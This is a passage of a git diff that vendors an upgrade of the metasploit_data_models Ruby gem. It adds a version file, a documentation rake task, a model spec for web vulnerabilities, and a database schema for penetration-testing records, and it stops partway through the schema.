lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/password_is_strong_validator.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb new file mode 100755 index 0000000000..ee7b61398b --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb @@ -0,0 +1,8 @@ +module MetasploitDataModels + # MetasploitDataModels follows the {http://semver.org/ Semantic Versioning Specification}. At this time, the API + # is considered unstable because although the database migrations have moved from + # metasploit-framework/data/sql/migrate to db/migrate in this project, not all models have specs that verify the + # migrations (with have_db_column and have_db_index) and certain models may not be shared between metasploit-framework + # and pro, so models may be removed in the future. Because of the unstable API the version should remain below 1.0.0 + VERSION = '0.5.1' +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/tasks/yard.rake b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/tasks/yard.rake new file mode 100644 index 0000000000..cc279684e7 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/tasks/yard.rake @@ -0,0 +1,27 @@ +# @note All options not specific to any given rake task should go in the .yardopts file so they are available to both +# the below rake tasks and when invoking `yard` from the command line + +require 'yard' +require 'yard/rake/yardoc_task' + +namespace :yard do + YARD::Rake::YardocTask.new(:doc) do |t| + # --no-stats here as 'stats' task called after will print fuller stats + t.options = ['--no-stats'] + + t.after = Proc.new { + Rake::Task['yard:stats'].execute + } + end + + desc "Shows stats for YARD Documentation including listing undocumented modules, classes, constants, and methods" + task :stats => :environment do + stats = YARD::CLI::Stats.new + stats.run('--compact', '--list-undoc') + end +end + +# @todo Figure out how to just clone description from yard:doc +desc "Generate YARD documentation" +# allow calling namespace to as a task that goes to default task for namespace +task :yard => ['yard:doc'] \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/metasploit_data_models.gemspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/metasploit_data_models.gemspec similarity index 88% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/metasploit_data_models.gemspec rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/metasploit_data_models.gemspec index ec0d9dd672..c3f3788558 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/metasploit_data_models.gemspec +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/metasploit_data_models.gemspec @@ -18,6 +18,10 @@ Gem::Specification.new do |s| # ---- Dependencies ---- s.add_development_dependency 'rake' + # markdown formatting for yard + s.add_development_dependency 'redcarpet' + # documentation + s.add_development_dependency 'yard' s.add_runtime_dependency 'activerecord', '>= 3.2.10' s.add_runtime_dependency 'activesupport' diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/script/rails similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/script/rails rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/script/rails diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb new file mode 100644 index 0000000000..d55706f947 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb @@ -0,0 +1,87 @@ +require 'spec_helper' + +describe Mdm::WebVuln do + let(:confidence_range) do + 1 .. 100 + end + + let(:methods) do + [ + 'GET', + 'POST', + # XXX not sure why PATH is valid since it's not an HTTP method verb. + 'PATH' + ] + end + + let(:risk_range) do + 0 .. 5 + end + + context 'associations' do + it { should belong_to(:web_site).class_name('Mdm::WebSite') } + end + + context 'CONSTANTS' do + it 'should define CONFIDENCE_RANGE' do + described_class::CONFIDENCE_RANGE.should == confidence_range + end + + it 'should define METHODS in any order' do + described_class::METHODS.should =~ methods + end + + it 'should define RISK_RANGE' do + described_class::RISK_RANGE.should == risk_range + end + end + + context 'database' do + context 'columns' do + it { should have_db_column(:blame).of_type(:text) } + it { should have_db_column(:category).of_type(:text).with_options(:null => false) } + it { should have_db_column(:confidence).of_type(:text).with_options(:null => false) } + it { should have_db_column(:description).of_type(:text) } + it { should have_db_column(:method).of_type(:string).with_options(:limit => 1024, :null => false) } + it { should have_db_column(:name).of_type(:string).with_options(:limit => 1024, :null => false) } + it { should have_db_column(:owner).of_type(:string) } + it { should have_db_column(:params).of_type(:text).with_options(:null => false) } + it { should have_db_column(:path).of_type(:text).with_options(:null => false) } + it { should have_db_column(:payload).of_type(:text) } + it { should have_db_column(:pname).of_type(:text).with_options(:null => false) } + it { should have_db_column(:proof).of_type(:binary).with_options(:null => false) } + it { should have_db_column(:query).of_type(:text) } + it { should have_db_column(:request).of_type(:binary) } + it { should have_db_column(:risk).of_type(:integer).with_options(:null => false) } + it { should have_db_column(:web_site_id).of_type(:integer).with_options(:null => false) } + + context 'timestamps' do + it { should have_db_column(:created_at).of_type(:datetime).with_options(:null => false) } + it { should have_db_column(:updated_at).of_type(:datetime).with_options(:null => false) } + end + end + + context 'indices' do + it { should have_db_index(:method) } + it { should have_db_index(:name) } + it { should have_db_index(:path) } + end + end + + context 'validations' do + it { should validate_presence_of :category } + it { should ensure_inclusion_of(:confidence).in_range(confidence_range) } + it { should ensure_inclusion_of(:method).in_array(methods) } + it { should validate_presence_of :name } + it { should validate_presence_of :path } + it { should validate_presence_of :params } + it { should validate_presence_of :pname } + it { should validate_presence_of :proof } + it { should ensure_inclusion_of(:risk).in_range(risk_range) } + it { should validate_presence_of :web_site } + end + + context 'serializations' do + it { should serialize(:params).as_instance_of(MetasploitDataModels::Base64Serializer) } + end +end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/Rakefile similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/Rakefile rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/Rakefile diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/javascripts/application.js b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/javascripts/application.js similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/javascripts/application.js rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/javascripts/application.js diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/stylesheets/application.css b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/stylesheets/application.css similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/stylesheets/application.css rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/stylesheets/application.css diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/controllers/application_controller.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/controllers/application_controller.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/controllers/application_controller.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/controllers/application_controller.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/helpers/application_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/helpers/application_helper.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/helpers/application_helper.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/helpers/application_helper.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/mailers/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/mailers/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/mailers/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/mailers/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/models/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/models/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/models/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/models/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/views/layouts/application.html.erb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/views/layouts/application.html.erb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/views/layouts/application.html.erb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/views/layouts/application.html.erb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config.ru b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config.ru similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config.ru rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config.ru diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/application.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/application.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/application.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/application.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/boot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/boot.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/boot.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/boot.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/database.yml.example b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/database.yml.example similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/database.yml.example rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/database.yml.example diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environment.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environment.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environment.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environment.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/development.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/development.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/development.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/development.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/production.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/production.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/production.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/production.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/test.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/test.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/test.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/test.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/backtrace_silencers.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/backtrace_silencers.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/backtrace_silencers.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/backtrace_silencers.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/inflections.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/inflections.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/inflections.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/inflections.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/mime_types.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/mime_types.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/mime_types.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/mime_types.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/secret_token.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/secret_token.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/secret_token.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/secret_token.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/session_store.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/session_store.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/session_store.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/session_store.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/wrap_parameters.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/wrap_parameters.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/wrap_parameters.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/wrap_parameters.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/routes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/routes.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/routes.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/routes.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/db/schema.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/db/schema.rb new file mode 100644 index 0000000000..bd6f124190 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/db/schema.rb @@ -0,0 +1,638 @@ +# encoding: UTF-8 +# This file is auto-generated from the current state of the database. Instead +# of editing this file, please use the migrations feature of Active Record to +# incrementally modify your database, and then regenerate this schema definition. +# +# Note that this schema.rb definition is the authoritative source for your +# database schema. If you need to create the application database on another +# system, you should be using db:schema:load, not running all the migrations +# from scratch. The latter is a flawed and unsustainable approach (the more migrations +# you'll amass, the slower it'll run and the greater likelihood for issues). +# +# It's strongly recommended to check this file into your version control system. + +ActiveRecord::Schema.define(:version => 20130228214900) do + + create_table "api_keys", :force => true do |t| + t.text "token" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + end + + create_table "attachments", :force => true do |t| + t.string "name", :limit => 512 + t.binary "data" + t.string "content_type", :limit => 512 + t.boolean "inline", :default => true, :null => false + t.boolean "zip", :default => false, :null => false + t.integer "campaign_id" + end + + create_table "attachments_email_templates", :id => false, :force => true do |t| + t.integer "attachment_id" + t.integer "email_template_id" + end + + create_table "campaigns", :force => true do |t| + t.integer "workspace_id", :null => false + t.string "name", :limit => 512 + t.text "prefs" + t.integer "status", :default => 0 + t.datetime "started_at" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + end + + create_table "clients", :force => true do |t| + t.integer "host_id" + t.datetime "created_at" + t.string "ua_string", :limit => 1024, :null => false + t.string "ua_name", :limit => 64 + t.string "ua_ver", :limit => 32 + t.datetime "updated_at" + t.integer "campaign_id" + end + + create_table "creds", :force => true do |t| + t.integer "service_id", :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.string "user", :limit => 2048 + t.string "pass", :limit => 4096 + t.boolean "active", :default => true + t.string "proof", :limit => 4096 + t.string "ptype", :limit => 256 + t.integer "source_id" + t.string "source_type" + end + + create_table "email_addresses", :force => true do |t| + t.integer "campaign_id", :null => false + t.string "first_name", :limit => 512 + t.string "last_name", :limit => 512 + t.string "address", :limit => 512 + t.boolean "sent", :default => false, :null => false + t.datetime "clicked_at" + end + + create_table "email_templates", :force => true do |t| + t.string "name", :limit => 512 + t.string "subject", :limit => 1024 + t.text "body" + t.integer "parent_id" + t.integer "campaign_id" + t.text "prefs" + end + + create_table "events", :force => true do |t| + t.integer "workspace_id" + t.integer "host_id" + t.datetime "created_at" + t.string "name" + t.datetime "updated_at" + t.boolean "critical" + t.boolean "seen" + t.string "username" + t.text "info" + end + + create_table "exploit_attempts", :force => true do |t| + t.integer "host_id" + t.integer "service_id" + t.integer "vuln_id" + t.datetime "attempted_at" + t.boolean "exploited" + t.string "fail_reason" + t.string "username" + t.text "module" + t.integer "session_id" + t.integer "loot_id" + t.integer "port" + t.string "proto" + t.text "fail_detail" + end + + create_table "exploited_hosts", :force => true do |t| + t.integer "host_id", :null => false + t.integer "service_id" + t.string "session_uuid", :limit => 8 + t.string "name", :limit => 2048 + t.string "payload", :limit => 2048 + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + end + + create_table "host_details", :force => true do |t| + t.integer "host_id" + t.integer "nx_console_id" + t.integer "nx_device_id" + t.string "src" + t.string "nx_site_name" + t.string "nx_site_importance" + t.string "nx_scan_template" + t.float "nx_risk_score" + end + + create_table "hosts", :force => true do |t| + t.datetime "created_at" + t.string "address", :limit => nil + t.string "mac" + t.string "comm" + t.string "name" + t.string "state" + t.string "os_name" + t.string "os_flavor" + t.string "os_sp" + t.string "os_lang" + t.string "arch" + t.integer "workspace_id" + t.datetime "updated_at" + t.text "purpose" + t.string "info", :limit => 65536 + t.text "comments" + t.text "scope" + t.text "virtual_host" + t.integer "note_count", :default => 0 + t.integer "vuln_count", :default => 0 + t.integer "service_count", :default => 0 + t.integer "host_detail_count", :default => 0 + t.integer "exploit_attempt_count", :default => 0 + end + + add_index "hosts", ["address"], :name => "index_hosts_on_address" + add_index "hosts", ["name"], :name => "index_hosts_on_name" + add_index "hosts", ["os_flavor"], :name => "index_hosts_on_os_flavor" + add_index "hosts", ["os_name"], :name => "index_hosts_on_os_name" + add_index "hosts", ["purpose"], :name => "index_hosts_on_purpose" + add_index "hosts", ["state"], :name => "index_hosts_on_state" + + create_table "hosts_tags", :id => false, :force => true do |t| + t.integer "host_id" + t.integer "tag_id" + end + + create_table "imported_creds", :force => true do |t| + t.integer "workspace_id", :default => 1, :null => false + t.string "user", :limit => 512 + t.string "pass", :limit => 512 + t.string "ptype", :limit => 16, :default => "password" + end + + create_table "listeners", :force => true do |t| + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.integer "workspace_id", :default => 1, :null => false + t.integer "task_id" + t.boolean "enabled", :default => true + t.text "owner" + t.text "payload" + t.text "address" + t.integer "port" + t.binary "options" + t.text "macro" + end + + create_table "loots", :force => true do |t| + t.integer "workspace_id", :default => 1, :null => false + t.integer "host_id" + t.integer "service_id" + t.string "ltype", :limit => 512 + t.string "path", :limit => 1024 + t.text "data" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.string "content_type" + t.text "name" + t.text "info" + end + + create_table "macros", :force => true do |t| + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.text "owner" + t.text "name" + t.text "description" + t.binary "actions" + t.binary "prefs" + end + + create_table "mod_refs", :force => true do |t| + t.string "module", :limit => 1024 + t.string "mtype", :limit => 128 + t.text "ref" + end + + create_table "module_actions", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + end + + add_index "module_actions", ["module_detail_id"], :name => "index_module_actions_on_module_detail_id" + + create_table "module_archs", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + end + + add_index "module_archs", ["module_detail_id"], :name => "index_module_archs_on_module_detail_id" + + create_table "module_authors", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + t.text "email" + end + + add_index "module_authors", ["module_detail_id"], :name => "index_module_authors_on_module_detail_id" + + create_table "module_details", :force => true do |t| + t.datetime "mtime" + t.text "file" + t.string "mtype" + t.text "refname" + t.text "fullname" + t.text "name" + t.integer "rank" + t.text "description" + t.string "license" + t.boolean "privileged" + t.datetime "disclosure_date" + t.integer "default_target" + t.text "default_action" + t.string "stance" + t.boolean "ready" + end + + add_index "module_details", ["description"], :name => "index_module_details_on_description" + add_index "module_details", ["mtype"], :name => "index_module_details_on_mtype" + add_index "module_details", ["name"], :name => "index_module_details_on_name" + add_index "module_details", ["refname"], :name => "index_module_details_on_refname" + + create_table "module_mixins", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + end + + add_index "module_mixins", ["module_detail_id"], :name => "index_module_mixins_on_module_detail_id" + + create_table "module_platforms", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + end + + add_index "module_platforms", ["module_detail_id"], :name => "index_module_platforms_on_module_detail_id" + + create_table "module_refs", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + end + + add_index "module_refs", ["module_detail_id"], :name => "index_module_refs_on_module_detail_id" + add_index "module_refs", ["name"], :name => "index_module_refs_on_name" + + create_table "module_targets", :force => true do |t| + t.integer "module_detail_id" + t.integer "index" + t.text "name" + end + + add_index "module_targets", ["module_detail_id"], :name => "index_module_targets_on_module_detail_id" + + create_table "nexpose_consoles", :force => true do |t| + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.boolean "enabled", :default => true + t.text "owner" + t.text "address" + t.integer "port", :default => 3780 + t.text "username" + t.text "password" + t.text "status" + t.text "version" + t.text "cert" + t.binary "cached_sites" + t.text "name" + end + + create_table "notes", :force => true do |t| + t.datetime "created_at" + t.string "ntype", :limit => 512 + t.integer "workspace_id", :default => 1, :null => false + t.integer "service_id" + t.integer "host_id" + t.datetime "updated_at" + t.boolean "critical" + t.boolean "seen" + t.text "data" + end + + add_index "notes", ["ntype"], :name => "index_notes_on_ntype" + + create_table "profiles", :force => true do |t| + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.boolean "active", :default => true + t.text "name" + t.text "owner" + t.binary "settings" + end + + create_table "refs", :force => true do |t| + t.integer "ref_id" + t.datetime "created_at" + t.string "name", :limit => 512 + t.datetime "updated_at" + end + + add_index "refs", ["name"], :name => "index_refs_on_name" + + create_table "report_templates", :force => true do |t| + t.integer "workspace_id", :default => 1, :null => false + t.string "created_by" + t.string "path", :limit => 1024 + t.text "name" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + end + + create_table "reports", :force => true do |t| + t.integer "workspace_id", :default => 1, :null => false + t.string "created_by" + t.string "rtype" + t.string "path", :limit => 1024 + t.text "options" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.datetime "downloaded_at" + t.integer "task_id" + t.string "name", :limit => 63 + end + + create_table "routes", :force => true do |t| + t.integer "session_id" + t.string "subnet" + t.string "netmask" + end + + create_table "services", :force => true do |t| + t.integer "host_id" + t.datetime "created_at" + t.integer "port", :null => false + t.string "proto", :limit => 16, :null => false + t.string "state" + t.string "name" + t.datetime "updated_at" + t.text "info" + end + + add_index "services", ["name"], :name => "index_services_on_name" + add_index "services", ["port"], :name => "index_services_on_port" + add_index "services", ["proto"], :name => "index_services_on_proto" + add_index "services", ["state"], :name => "index_services_on_state" + + create_table "session_events", :force => true do |t| + t.integer "session_id" + t.string "etype" + t.binary "command" + t.binary "output" + t.string "remote_path" + t.string "local_path" + t.datetime "created_at" + end + + create_table "sessions", :force => true do |t| + t.integer "host_id" + t.string "stype" + t.string "via_exploit" + t.string "via_payload" + t.string "desc" + t.integer "port" + t.string "platform" + t.text "datastore" + t.datetime "opened_at", :null => false + t.datetime "closed_at" + t.string "close_reason" + t.integer "local_id" + t.datetime "last_seen" + end + + create_table "tags", :force => true do |t| + t.integer "user_id" + t.string "name", :limit => 1024 + t.text "desc" + t.boolean "report_summary", :default => false, :null => false + t.boolean "report_detail", :default => false, :null => false + t.boolean "critical", :default => false, :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + end + + create_table "tasks", :force => true do |t| + t.integer "workspace_id", :default => 1, :null => false + t.string "created_by" + t.string "module" + t.datetime "completed_at" + t.string "path", :limit => 1024 + t.string "info" + t.string "description" + t.integer "progress" + t.text "options" + t.text "error" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.text "result" + t.string "module_uuid", :limit => 8 + t.binary "settings" + end + + create_table "users", :force => true do |t| + t.string "username" + t.string "crypted_password" + t.string "password_salt" + t.string "persistence_token" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.string "fullname" + t.string "email" + t.string "phone" + t.string "company" + t.string "prefs", :limit => 524288 + t.boolean "admin", :default => true, :null => false + end + + create_table "vuln_attempts", :force => true do |t| + t.integer "vuln_id" + t.datetime "attempted_at" + t.boolean "exploited" + t.string "fail_reason" + t.string "username" + t.text "module" + t.integer "session_id" + t.integer "loot_id" + t.text "fail_detail" + end + + create_table "vuln_details", :force => true do |t| + t.integer "vuln_id" + t.float "cvss_score" + t.string "cvss_vector" + t.string "title" + t.text "description" + t.text "solution" + t.binary "proof" + t.integer "nx_console_id" + t.integer "nx_device_id" + t.string "nx_vuln_id" + t.float "nx_severity" + t.float "nx_pci_severity" + t.datetime "nx_published" + t.datetime "nx_added" + t.datetime "nx_modified" + t.text "nx_tags" + t.text "nx_vuln_status" + t.text "nx_proof_key" + t.string "src" + t.integer "nx_scan_id" + t.datetime "nx_vulnerable_since" + t.string "nx_pci_compliance_status" + end + + create_table "vulns", :force => true do |t| + t.integer "host_id" + t.integer "service_id" + t.datetime "created_at" + t.string "name" + t.datetime "updated_at" + t.string "info", :limit => 65536 + t.datetime "exploited_at" + t.integer "vuln_detail_count", :default => 0 + t.integer "vuln_attempt_count", :default => 0 + end + + add_index "vulns", ["name"], :name => "index_vulns_on_name" + + create_table "vulns_refs", :id => false, :force => true do |t| + t.integer "ref_id" + t.integer "vuln_id" + end + + create_table "web_forms", :force => true do |t| + t.integer "web_site_id", :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.text "path" + t.string "method", :limit => 1024 + t.text "params" + t.text "query" + end + + add_index "web_forms", ["path"], :name => "index_web_forms_on_path" + + create_table "web_pages", :force => true do |t| + t.integer "web_site_id", :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.text "path" + t.text "query" + t.integer "code", :null => false + t.text "cookie" + t.text "auth" + t.text "ctype" + t.datetime "mtime" + t.text "location" + t.text "headers" + t.binary "body" + t.binary "request" + end + + add_index "web_pages", ["path"], :name => 